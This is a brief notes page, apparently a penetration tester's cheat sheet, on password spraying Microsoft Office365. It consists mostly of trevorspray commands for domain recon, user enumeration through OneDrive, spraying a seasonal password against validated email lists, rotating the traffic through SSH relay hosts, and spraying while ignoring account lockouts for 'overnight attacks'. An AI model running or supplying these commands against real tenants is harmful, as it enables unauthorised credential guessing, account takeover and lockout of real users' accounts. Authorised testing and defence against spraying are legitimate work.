A list of tools and resources that I use for password spraying Microsoft products.

Password Spraying Office365


# Installation
pip install git+
pip install git+

# Perform recon against a domain
trevorspray --recon $domain

# Enumerate users via OneDrive
trevorspray --recon $domain -u $emails --threads 3

# Spray with a 10 second delay between requests
trevorspray -u $validemails -p 'Winter2022!' --delay 10

# Spray with two robins and the current system
trevorspray -u $validemails -p 'Winter2022!' --ssh root@$robin root@$robin

# Spray while ignoring account lockout (good for overnight attacks)
trevorspray -u $validemails -p $passwords --ignore-lockouts

Identifying Emails without OSINT


Last updated